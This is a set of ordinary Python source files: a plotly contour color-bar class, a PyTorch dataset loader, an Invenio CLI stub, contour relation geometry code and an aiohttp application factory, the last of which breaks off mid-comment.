# ypad
# ----
@property
def ypad(self):
"""
Sets the amount of padding (in px) along the y direction.
The 'ypad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["ypad"]
@ypad.setter
def ypad(self, val):
self["ypad"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
            Sets the width (in px) of the border enclosing this
color bar.
dtick
Sets the step in-between ticks on this axis. Use with
`tick0`. Must be a positive number, or special strings
available to "log" and "date" axes. If the axis `type`
is "log", then ticks are set every 10^(n*dtick) where n
is the tick number. For example, to set a tick mark at
1, 10, 100, 1000, ... set dtick to 1. To set tick marks
at 1, 100, 10000, ... set dtick to 2. To set tick marks
at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special
values; "L<f>", where `f` is a positive number, gives
ticks linearly spaced in value (but not position). For
example `tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus
small digits between, use "D1" (all digits) or "D2"
(only 2 and 5). `tick0` is ignored for "D1" and "D2".
If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to 86400000.0.
"date" also has special values "M<n>" gives ticks
spaced by a number of months. `n` must be a positive
integer. To set ticks on the 15th of every third month,
set `tick0` to "2000-01-15" and `dtick` to "M3". To set
ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick exponents.
For example, consider the number 1,000,000,000. If
"none", it appears as 1,000,000,000. If "e", 1e+9. If
"E", 1E+9. If "power", 1x10^9 (with 9 in a super
script). If "SI", 1G. If "B", 1B.
len
            Sets the length of the color bar. This measure excludes
the padding of both ends. That is, the color bar length
is this length minus the padding on both ends.
lenmode
Determines whether this color bar's length (i.e. the
measure in the color variation direction) is set in
            units of plot "fraction" or in "pixels". Use `len` to
set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks will be
chosen automatically to be less than or equal to
`nticks`. Has an effect only if `tickmode` is set to
"auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of the
first tick is shown. If "last", only the exponent of
the last tick is shown. If "none", no exponents appear.
showticklabels
Determines whether or not the tick labels are drawn.
showtickprefix
If "all", all tick labels are displayed with a prefix.
If "first", only the first tick is displayed with a
prefix. If "last", only the last tick is displayed with
            a prefix. If "none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
            Sets the thickness of the color bar. This measure
excludes the size of the padding, ticks and labels.
thicknessmode
Determines whether this color bar's thickness (i.e. the
measure in the constant color direction) is set in
units of plot "fraction" or in "pixels". Use
`thickness` to set the value.
tick0
Sets the placement of the first tick on this axis. Use
with `dtick`. If the axis `type` is "log", then you
must take the log of your starting tick (e.g. to set
the starting tick to 100, set the `tick0` to 2) except
when `dtick`=*L<f>* (see `dtick` for more info). If the
axis `type` is "date", it should be a date string, like
date data. If the axis `type` is "category", it should
be a number, using the scale where each category is
assigned a serial number from zero in the order it
appears.
tickangle
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the
tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3 formatting
mini-languages which are very similar to those in
Python. For numbers, see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format And for
dates see: https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format We add
one item to d3's date formatter: "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display "09~15~23.46"
tickformatstops
A tuple of :class:`plotly.graph_objects.contour.colorba
r.Tickformatstop` instances or dicts with compatible
properties
tickformatstopdefaults
When used in a template (as layout.template.data.contou
r.colorbar.tickformatstopdefaults), sets the default
property values to use for elements of
contour.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto", the number
of ticks is set via `nticks`. If "linear", the
placement of the ticks is determined by a starting
position `tick0` and a tick step `dtick` ("linear" is
the default value if `tick0` and `dtick` are provided).
If "array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`. ("array" is
the default value if `tickvals` is provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If "", this
axis' ticks are not drawn. If "outside" ("inside"),
            this axis' ticks are drawn outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position via
`tickvals`. Only has an effect if `tickmode` is set to
"array". Used with `tickvals`.
ticktextsrc
Sets the source reference on Chart Studio Cloud for
ticktext .
tickvals
Sets the values at which ticks on this axis appear.
Only has an effect if `tickmode` is set to "array".
Used with `ticktext`.
tickvalssrc
Sets the source reference on Chart Studio Cloud for
tickvals .
tickwidth
Sets the tick width (in px).
title
:class:`plotly.graph_objects.contour.colorbar.Title`
instance or dict with compatible properties
titlefont
Deprecated: Please use contour.colorbar.title.font
instead. Sets this color bar's title font. Note that
the title's font used to be set by the now deprecated
`titlefont` attribute.
titleside
Deprecated: Please use contour.colorbar.title.side
instead. Determines the location of color bar's title
with respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position anchor. This
anchor binds the `x` position to the "left", "center"
or "right" of the color bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
            Sets this color bar's vertical position anchor. This
anchor binds the `y` position to the "top", "middle" or
"bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
"""
_mapped_properties = {
"titlefont": ("title", "font"),
"titleside": ("title", "side"),
}
def __init__(
self,
arg=None,
bgcolor=None,
bordercolor=None,
borderwidth=None,
dtick=None,
exponentformat=None,
len=None,
lenmode=None,
nticks=None,
outlinecolor=None,
outlinewidth=None,
separatethousands=None,
showexponent=None,
showticklabels=None,
showtickprefix=None,
showticksuffix=None,
thickness=None,
thicknessmode=None,
tick0=None,
tickangle=None,
tickcolor=None,
tickfont=None,
tickformat=None,
tickformatstops=None,
tickformatstopdefaults=None,
ticklen=None,
tickmode=None,
tickprefix=None,
ticks=None,
ticksuffix=None,
ticktext=None,
ticktextsrc=None,
tickvals=None,
tickvalssrc=None,
tickwidth=None,
title=None,
titlefont=None,
titleside=None,
x=None,
xanchor=None,
xpad=None,
y=None,
yanchor=None,
ypad=None,
**kwargs
):
"""
Construct a new ColorBar object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.contour.ColorBar`
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
            Sets the width (in px) of the border enclosing this
color bar.
dtick
Sets the step in-between ticks on this axis. Use with
`tick0`. Must be a positive number, or special strings
available to "log" and "date" axes. If the axis `type`
is "log", then ticks are set every 10^(n*dtick) where n
is the tick number. For example, to set a tick mark at
1, 10, 100, 1000, ... set dtick to 1. To set tick marks
at 1, 100, 10000, ... set dtick to 2. To set tick marks
at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special
values; "L<f>", where `f` is a positive number, gives
ticks linearly spaced in value (but not position). For
example `tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus
small digits between, use "D1" (all digits) or "D2"
(only 2 and 5). `tick0` is ignored for "D1" and "D2".
If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to 86400000.0.
"date" also has special values "M<n>" gives ticks
spaced by a number of months. `n` must be a positive
integer. To set ticks on the 15th of every third month,
set `tick0` to "2000-01-15" and `dtick` to "M3". To set
ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick exponents.
For example, consider the number 1,000,000,000. If
"none", it appears as 1,000,000,000. If "e", 1e+9. If
"E", 1E+9. If "power", 1x10^9 (with 9 in a super
script). If "SI", 1G. If "B", 1B.
len
            Sets the length of the color bar. This measure excludes
the padding of both ends. That is, the color bar length
is this length minus the padding on both ends.
lenmode
Determines whether this color bar's length (i.e. the
measure in the color variation direction) is set in
            units of plot "fraction" or in "pixels". Use `len` to
set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks will be
chosen automatically to be less than or equal to
`nticks`. Has an effect only if `tickmode` is set to
"auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of the
first tick is shown. If "last", only the exponent of
the last tick is shown. If "none", no exponents appear.
showticklabels
Determines whether or not the tick labels are drawn.
showtickprefix
If "all", all tick labels are displayed with a prefix.
If "first", only the first tick is displayed with a
prefix. If "last", only the last tick is displayed with
            a prefix. If "none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
            Sets the thickness of the color bar. This measure
excludes the size of the padding, ticks and labels.
thicknessmode
Determines whether this color bar's thickness (i.e. the
measure in the constant color direction) is set in
units of plot "fraction" or in "pixels". Use
`thickness` to set the value.
tick0
Sets the placement of the first tick on this axis. Use
with `dtick`. If the axis `type` is "log", then you
must take the log of your starting tick (e.g. to set
the starting tick to 100, set the `tick0` to 2) except
when `dtick`=*L<f>* (see `dtick` for more info). If the
axis `type` is "date", it should be a date string, like
date data. If the axis `type` is "category", it should
be a number, using the scale where each category is
assigned a serial number from zero in the order it
appears.
tickangle
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the
tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3 formatting
mini-languages which are very similar to those in
Python. For numbers, see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format And for
dates see: https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format We add
one item to d3's date formatter: "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display "09~15~23.46"
tickformatstops
A tuple of :class:`plotly.graph_objects.contour.colorba
r.Tickformatstop` instances or dicts with compatible
properties
tickformatstopdefaults
When used in a template (as layout.template.data.contou
r.colorbar.tickformatstopdefaults), sets the default
property values to use for elements of
contour.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto", the number
of ticks is set via `nticks`. If "linear", the
placement of the ticks is determined by a starting
position `tick0` and a tick step `dtick` ("linear" is
the default value if `tick0` and `dtick` are provided).
If "array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`. ("array" is
the default value if `tickvals` is provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If "", this
axis' ticks are not drawn. If "outside" ("inside"),
            this axis' ticks are drawn outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position via
`tickvals`. Only has an effect if `tickmode` is set to
"array". Used with `tickvals`.
ticktextsrc
Sets the source reference on Chart Studio Cloud for
ticktext .
tickvals
Sets the values at which ticks on this axis appear.
Only has an effect if `tickmode` is set to "array".
Used with `ticktext`.
tickvalssrc
Sets the source reference on Chart Studio Cloud for
tickvals .
tickwidth
Sets the tick width (in px).
title
:class:`plotly.graph_objects.contour.colorbar.Title`
instance or dict with compatible properties
titlefont
Deprecated: Please use contour.colorbar.title.font
instead. Sets this color bar's title font. Note that
the title's font used to be set by the now deprecated
`titlefont` attribute.
titleside
Deprecated: Please use contour.colorbar.title.side
instead. Determines the location of color bar's title
with respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position anchor. This
anchor binds the `x` position to the "left", "center"
or "right" of the color bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
            Sets this color bar's vertical position anchor. This
anchor binds the `y` position to the "top", "middle" or
"bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
ColorBar
"""
super(ColorBar, self).__init__("colorbar")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.contour.ColorBar
constructor must be a dict or
an instance of :class:`plotly.graph_objs.contour.ColorBar`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("bgcolor", None)
_v = bgcolor if bgcolor is not None else _v
if _v is not None:
self["bgcolor"] = _v
_v = arg.pop("bordercolor", None)
_v = bordercolor if bordercolor is not None else _v
if _v is not None:
self["bordercolor"] = _v
_v = arg.pop("borderwidth", None)
_v = borderwidth if borderwidth is not None else _v
if _v is not None:
self["borderwidth"] = _v
_v = arg.pop("dtick", None)
_v = dtick if dtick is not None else _v
if _v is not None:
self["dtick"] = _v
_v = arg.pop("exponentformat", None)
_v = exponentformat if exponentformat is not None else _v
if _v is not None:
self["exponentformat"] = _v
_v = arg.pop("len", None)
_v = len if len is not None else _v
if _v is not None:
self["len"] = _v
_v = arg.pop("lenmode", None)
_v = lenmode if lenmode is not None else _v
if _v is not None:
self["lenmode"] = _v
_v = arg.pop("nticks", None)
_v = nticks if nticks is not None else _v
if _v is not None:
self["nticks"] = _v
_v = arg.pop("outlinecolor", None)
_v = outlinecolor if outlinecolor is not None else _v
if _v is not None:
self["outlinecolor"] = _v
_v = arg.pop("outlinewidth", None)
_v = outlinewidth if outlinewidth is not None else _v
if _v is not None:
self["outlinewidth"] = _v
_v = arg.pop("separatethousands", None)
_v = separatethousands if separatethousands is not None else _v
if _v is not None:
self["separatethousands"] = _v
_v = arg.pop("showexponent", None)
_v = showexponent if showexponent is not None else _v
if _v is not None:
self["showexponent"] = _v
_v = arg.pop("showticklabels", None)
_v = showticklabels if showticklabels is not None else _v
if _v is not None:
self["showticklabels"] = _v
_v = arg.pop("showtickprefix", None)
_v = showtickprefix if showtickprefix is not None else _v
if _v is not None:
self["showtickprefix"] = _v
_v = arg.pop("showticksuffix", None)
_v = showticksuffix if showticksuffix is not None else _v
if _v is not None:
self["showticksuffix"] = _v
_v = arg.pop("thickness", None)
_v = thickness if thickness is not None else _v
if _v is not None:
self["thickness"] = _v
_v = arg.pop("thicknessmode", None)
_v = thicknessmode if thicknessmode is not None else _v
if _v is not None:
self["thicknessmode"] = _v
_v = arg.pop("tick0", None)
_v = tick0 if tick0 is not None else _v
if _v is not None:
self["tick0"] = _v
_v = arg.pop("tickangle", None)
_v = tickangle if tickangle is not None else _v
if _v is not None:
self["tickangle"] = _v
_v = arg.pop("tickcolor", None)
_v = tickcolor if tickcolor is not None else _v
if _v is not None:
self["tickcolor"] = _v
_v = arg.pop("tickfont", None)
_v = tickfont if tickfont is not None else _v
if _v is not None:
self["tickfont"] = _v
_v = arg.pop("tickformat", None)
_v = tickformat if tickformat is not None else _v
if _v is not None:
self["tickformat"] = _v
_v = arg.pop("tickformatstops", None)
_v = tickformatstops if tickformatstops is not None else _v
if _v is not None:
self["tickformatstops"] = _v
_v = arg.pop("tickformatstopdefaults", None)
_v = tickformatstopdefaults if tickformatstopdefaults is not None else _v
if _v is not None:
self["tickformatstopdefaults"] = _v
_v = arg.pop("ticklen", None)
_v = ticklen if ticklen is not None else _v
if _v is not None:
self["ticklen"] = _v
_v = arg.pop("tickmode", None)
_v = tickmode if tickmode is not None else _v
if _v is not None:
self["tickmode"] = _v
_v = arg.pop("tickprefix", None)
_v = tickprefix if tickprefix is not None else _v
if _v is not None:
self["tickprefix"] = _v
_v = arg.pop("ticks", None)
_v = ticks if ticks is not None else _v
if _v is not None:
self["ticks"] = _v
_v = arg.pop("ticksuffix", None)
_v = ticksuffix if ticksuffix is not None else _v
if _v is not None:
self["ticksuffix"] = _v
_v = arg.pop("ticktext", None)
_v = ticktext if ticktext is not None else _v
if _v is not None:
self["ticktext"] = _v
_v = arg.pop("ticktextsrc", None)
_v = ticktextsrc if ticktextsrc is not None else _v
if _v is not None:
self["ticktextsrc"] = _v
_v = arg.pop("tickvals", None)
_v = tickvals if tickvals is not None else _v
if _v is not None:
self["tickvals"] = _v
_v = arg.pop("tickvalssrc", None)
_v = tickvalssrc if tickvalssrc is not None else _v
if _v is not None:
self["tickvalssrc"] = _v
_v = arg.pop("tickwidth", None)
_v = tickwidth if tickwidth is not None else _v
if _v is not None:
self["tickwidth"] = _v
_v = arg.pop("title", None)
_v = title if title is not None else _v
if _v is not None:
self["title"] = _v
_v = arg.pop("titlefont", None)
_v = titlefont if titlefont is not None else _v
if _v is not None:
self["titlefont"] = _v
_v = arg.pop("titleside", None)
_v = titleside if titleside is not None else _v
if _v is not None:
self["titleside"] = _v
_v = arg.pop("x", None)
_v = x if x is not None else _v
if _v is not None:
self["x"] = _v
_v = arg.pop("xanchor", None)
_v = xanchor if xanchor is not None else _v
if _v is not None:
self["xanchor"] = _v
_v = arg.pop("xpad", None)
_v = xpad if xpad is not None else _v
if _v is not None:
self["xpad"] = _v
_v = arg.pop("y", None)
_v = y if y is not None else _v
if _v is not None:
self["y"] = _v
_v = arg.pop("yanchor", None)
_v = yanchor if yanchor is not None else _v
if _v is not None:
self["yanchor"] = _v
_v = arg.pop("ypad", None)
_v = ypad if ypad is not None else _v
if _v is not None:
self["ypad"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
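# Illustrative usage sketch (not part of the generated class above): it shows a
# contour trace whose color bar is configured through this ColorBar class. The z
# values are invented for demonstration; the plotly.graph_objects calls are the
# library's public API. The __main__ guard keeps the example from running on import.
if __name__ == "__main__":
    import plotly.graph_objects as go
    fig = go.Figure(
        go.Contour(
            z=[[1, 2, 3], [2, 4, 6], [3, 6, 9]],
            colorbar=go.contour.ColorBar(
                title=dict(text="Value", side="right"),
                thickness=20,  # in px, since thicknessmode defaults to "pixels"
                len=0.75,  # as a plot fraction, since lenmode defaults to "fraction"
                tickmode="array",
                tickvals=[1, 5, 9],
                ticktext=["low", "mid", "high"],
            ),
        )
    )
    fig.show()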
|
py | 1a4fbfc4d6435831acbcdf35d8c72f7a4d433142 | """This package includes all the modules related to data loading and preprocessing
To add a custom dataset class called 'dummy', you need to add a file called 'dummy_dataset.py' and define a subclass 'DummyDataset' inherited from BaseDataset.
You need to implement four functions:
-- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt).
-- <__len__>: return the size of dataset.
-- <__getitem__>: get a data point from data loader.
-- <modify_commandline_options>: (optionally) add dataset-specific options and set default options.
Now you can use the dataset class by specifying flag '--dataset_mode dummy'.
See our template dataset class 'template_dataset.py' for more details.
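An illustrative, hypothetical sketch of such a dataset class is appended at the end of this module.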
"""
import importlib
import torch.utils.data
from data.base_dataset import BaseDataset
from data.base3D_dataset import BaseDataset3D
def find_dataset_using_name(dataset_name):
"""Import the module "data/[dataset_name]_dataset.py".
In the file, the class called DatasetNameDataset() will
be instantiated. It has to be a subclass of BaseDataset,
and it is case-insensitive.
"""
dataset_filename = "data." + dataset_name + "_dataset"
datasetlib = importlib.import_module(dataset_filename)
dataset = None
target_dataset_name = dataset_name.replace('_', '') + 'dataset'
for name, cls in datasetlib.__dict__.items():
if name.lower() == target_dataset_name.lower() \
and (issubclass(cls, BaseDataset) or issubclass(cls, BaseDataset3D)):
dataset = cls
if dataset is None:
raise NotImplementedError("In %s.py, there should be a subclass of BaseDataset with class name that matches %s in lowercase." % (dataset_filename, target_dataset_name))
return dataset
def get_option_setter(dataset_name):
"""Return the static method <modify_commandline_options> of the dataset class."""
dataset_class = find_dataset_using_name(dataset_name)
return dataset_class.modify_commandline_options
def create_dataset(opt):
"""Create a dataset given the option.
This function wraps the class CustomDatasetDataLoader.
This is the main interface between this package and 'train.py'/'test.py'
Example:
>>> from data import create_dataset
>>> dataset = create_dataset(opt)
"""
data_loader = CustomDatasetDataLoader(opt)
dataset = data_loader.load_data()
return dataset
class CustomDatasetDataLoader():
"""Wrapper class of Dataset class that performs multi-threaded data loading"""
def __init__(self, opt):
"""Initialize this class
Step 1: create a dataset instance given the name [dataset_mode]
Step 2: create a multi-threaded data loader.
"""
self.opt = opt
dataset_class = find_dataset_using_name(opt.dataset_mode)
self.dataset = dataset_class(opt)
print("dataset [%s] was created" % type(self.dataset).__name__)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batch_size,
shuffle=not opt.serial_batches,
num_workers=int(opt.num_threads),
drop_last=True if opt.isTrain else False,
)
self.i = None
def set_epoch(self, epoch):
self.dataset.current_epoch = epoch
def load_data(self):
return self
def __len__(self):
"""Return the number of data in the dataset"""
return min(len(self.dataset), self.opt.max_dataset_size)
    def __iter__(self):
        """Return an iterator over batches, capped at opt.max_dataset_size samples"""
        self.i = 0
        # Keep a handle on the underlying iterator and return self, so that
        # __next__ below is actually used and can enforce the size cap;
        # returning iter(self.dataloader) directly would bypass it.
        self._data_iter = iter(self.dataloader)
        return self
    def __next__(self):
        """Return the next batch of data"""
        if self.i * self.opt.batch_size >= self.opt.max_dataset_size:
            raise StopIteration()
        item = next(self._data_iter)
        self.i += 1
        return item
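# Illustrative sketch (not part of the package): a minimal custom dataset of the
# kind the module docstring describes. In real use it would live in its own file,
# data/dummy_dataset.py, so that find_dataset_using_name('dummy') can discover it
# through '--dataset_mode dummy'. The '--dummy_option' flag, the (parser, is_train)
# signature and the returned dict keys are assumptions made for demonstration only.
class DummyDataset(BaseDataset):
    """Minimal example dataset implementing the four required functions."""
    @staticmethod
    def modify_commandline_options(parser, is_train):
        # (optionally) add dataset-specific options and set default options
        parser.add_argument('--dummy_option', type=int, default=0, help='hypothetical dataset-specific option')
        return parser
    def __init__(self, opt):
        BaseDataset.__init__(self, opt)  # first call the base initializer, as the docstring instructs
        self.paths = []  # collect the paths (or records) of the data points here
    def __len__(self):
        """Return the size of the dataset."""
        return len(self.paths)
    def __getitem__(self, index):
        """Get a data point from the data loader."""
        return {'A': self.paths[index], 'A_paths': self.paths[index]}  # key names are illustrative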
|
py | 1a4fc076b14469c32812bb5e5730a41d354f7a78 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Application bootstraping."""
from __future__ import absolute_import, print_function
import warnings
import click
from flask import current_app
from flask.cli import with_appcontext
from pkg_resources import iter_entry_points, resource_filename, working_set
@click.group()
def instance():
"""Instance commands."""
# Even more
# top-level
# block comments
def main():
pass
|
py | 1a4fc11acd3501cd6965d4fe00c8499f51fc61a5 | from itertools import chain
from typing import Iterable
from ground.base import (Context,
Location,
Orientation,
Relation)
from ground.hints import (Contour,
Multisegment,
Point,
Segment)
from . import box
from .events_queue import (CompoundEventsQueue,
LinearEventsQueue)
from .hints import SegmentEndpoints
from .multisegment import to_segments_endpoints
from .processing import (process_closed_linear_queue,
process_open_linear_queue)
from .segment import (locate_point as locate_point_to_segment,
relate_segment as relate_segments)
def locate_point(contour: Contour, point: Point, context: Context) -> Location:
return (Location.EXTERIOR
if all(locate_point_to_segment(segment, point, context)
is Location.EXTERIOR
for segment in context.contour_segments(contour))
else Location.BOUNDARY)
def relate_segment(contour: Contour,
segment: Segment,
context: Context) -> Relation:
angle_orientation = context.angle_orientation
has_no_touch = has_no_cross = True
last_touched_edge_index = last_touched_edge_start = None
start, end = segment.start, segment.end
for index, sub_segment in enumerate(context.contour_segments(contour)):
sub_segment_start, sub_segment_end = sub_segment_endpoints = (
sub_segment.start, sub_segment.end)
relation = relate_segments(sub_segment, segment, context)
if relation is Relation.COMPONENT or relation is Relation.EQUAL:
return Relation.COMPONENT
elif relation is Relation.OVERLAP or relation is Relation.COMPOSITE:
return Relation.OVERLAP
elif relation is Relation.TOUCH:
if has_no_touch:
has_no_touch = False
elif (has_no_cross
and index - last_touched_edge_index == 1
and start not in sub_segment_endpoints
and end not in sub_segment_endpoints
and (angle_orientation(start, end, sub_segment_start)
is Orientation.COLLINEAR)
and point_vertex_line_divides_angle(start,
last_touched_edge_start,
sub_segment_start,
sub_segment_end,
context)):
has_no_cross = False
last_touched_edge_index = index
last_touched_edge_start = sub_segment_start
elif has_no_cross and relation is Relation.CROSS:
has_no_cross = False
vertices = contour.vertices
if (has_no_cross
and not has_no_touch
and last_touched_edge_index == len(vertices) - 1):
first_sub_segment_endpoints = (first_sub_segment_start,
first_sub_segment_end) = (vertices[-1],
vertices[0])
if (relate_segments(context.segment_cls(first_sub_segment_start,
first_sub_segment_end),
segment,
context) is Relation.TOUCH
and start not in first_sub_segment_endpoints
and end not in first_sub_segment_endpoints
and (angle_orientation(start, end, first_sub_segment_start)
is Orientation.COLLINEAR)
and point_vertex_line_divides_angle(start, vertices[-2],
first_sub_segment_start,
first_sub_segment_end,
context)):
has_no_cross = False
return ((Relation.DISJOINT if has_no_touch else Relation.TOUCH)
if has_no_cross
else Relation.CROSS)
def point_vertex_line_divides_angle(point: Point,
first_ray_point: Point,
vertex: Point,
second_ray_point: Point,
context: Context) -> bool:
return (context.angle_orientation(vertex, first_ray_point, point)
is context.angle_orientation(vertex, point, second_ray_point))
def relate_multisegment(contour: Contour,
multisegment: Multisegment,
context: Context) -> Relation:
contour_bounding_box = context.contour_box(contour)
multisegment_bounding_box = context.segments_box(multisegment.segments)
if box.disjoint_with(contour_bounding_box, multisegment_bounding_box):
return Relation.DISJOINT
events_queue = LinearEventsQueue(context)
events_queue.register(to_edges_endpoints(contour),
from_test=False)
events_queue.register(to_segments_endpoints(multisegment),
from_test=True)
return process_open_linear_queue(events_queue,
min(contour_bounding_box.max_x,
multisegment_bounding_box.max_x))
def relate_contour(goal: Contour, test: Contour, context: Context) -> Relation:
goal_bounding_box, test_bounding_box = (context.contour_box(goal),
context.contour_box(test))
if box.disjoint_with(goal_bounding_box, test_bounding_box):
return Relation.DISJOINT
if equal(goal, test, context):
return Relation.EQUAL
events_queue = CompoundEventsQueue(context)
events_queue.register(to_oriented_edges_endpoints(goal, context),
from_test=False)
events_queue.register(to_oriented_edges_endpoints(test, context),
from_test=True)
return process_closed_linear_queue(events_queue,
min(goal_bounding_box.max_x,
test_bounding_box.max_x))
def equal(left: Contour, right: Contour, context: Context) -> bool:
left_vertices, right_vertices = left.vertices, right.vertices
if len(left_vertices) != len(right_vertices):
return False
try:
index = right_vertices.index(left_vertices[0])
except ValueError:
return False
same_oriented = orientation(left, context) is orientation(right, context)
right_step = 1 if same_oriented else -1
size = len(left_vertices)
indices = chain(zip(range(size),
range(index, size)
if same_oriented
else range(index, -1, right_step)),
zip(range(size - index if same_oriented else index + 1,
size),
range(index)
if same_oriented
else range(size - 1, index - 1, right_step)))
return all(left_vertices[left_index] == right_vertices[right_index]
for left_index, right_index in indices)
def orientation(contour: Contour, context: Context) -> Orientation:
vertices = contour.vertices
index = min(range(len(vertices)),
key=vertices.__getitem__)
return context.angle_orientation(vertices[index - 1], vertices[index],
vertices[(index + 1) % len(vertices)])
def to_edges_endpoints(contour: Contour) -> Iterable[SegmentEndpoints]:
vertices = contour.vertices
return ((vertices[index - 1], vertices[index])
for index in range(len(vertices)))
def to_oriented_edges_endpoints(contour: Contour,
context: Context,
clockwise: bool = False
) -> Iterable[SegmentEndpoints]:
vertices = contour.vertices
return (((vertices[index - 1], vertices[index])
for index in range(len(vertices)))
if (orientation(contour, context)
is (Orientation.CLOCKWISE
if clockwise
else Orientation.COUNTERCLOCKWISE))
else ((vertices[index], vertices[index - 1])
for index in range(len(vertices) - 1, -1, -1)))
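# Example usage (illustrative sketch, not part of the original module): the helpers
# above operate on the ``ground`` library's geometries through a Context object.
# This assumes ``ground.base.get_context`` and the context's ``point_cls`` /
# ``contour_cls`` attributes behave as in the version this module targets.
if __name__ == '__main__':
    from ground.base import get_context

    _context = get_context()
    _Point, _Contour = _context.point_cls, _context.contour_cls
    _goal = _Contour([_Point(0, 0), _Point(4, 0), _Point(0, 4)])
    # same vertex cycle, traversed in the opposite order
    _test = _Contour([_Point(0, 0), _Point(0, 4), _Point(4, 0)])
    print(orientation(_goal, _context))            # e.g. Orientation.COUNTERCLOCKWISE
    print(relate_contour(_goal, _test, _context))  # expected: Relation.EQUAL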
|
py | 1a4fc15e51fdbe5576aca5977a0310f9d4281e12 |
from aiohttp import web
from tt_web import log
from tt_web import postgresql
async def on_startup(app):
await postgresql.initialize(app['config']['database'])
async def on_cleanup(app):
await postgresql.deinitialize()
def register_routers(app):
from . import handlers
app.router.add_post('/apply', handlers.apply)
app.router.add_post('/get-items', handlers.get_items)
app.router.add_post('/has-items', handlers.has_items)
app.router.add_post('/get-item-logs', handlers.get_item_logs)
app.router.add_post('/debug-clear-service', handlers.debug_clear_service)
def create_application(config):
app = web.Application()
app['config'] = config
log.initilize(config['log'])
app.on_startup.append(on_startup)
app.on_cleanup.append(on_cleanup)
register_routers(app)
return app
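# Example usage (sketch): the exact contents of the config dict are defined by the
# tt_web service configuration and are only hinted at here by the keys accessed above;
# the port is illustrative.
#
#     from aiohttp import web
#
#     config = {'database': {...},  # passed to tt_web.postgresql.initialize
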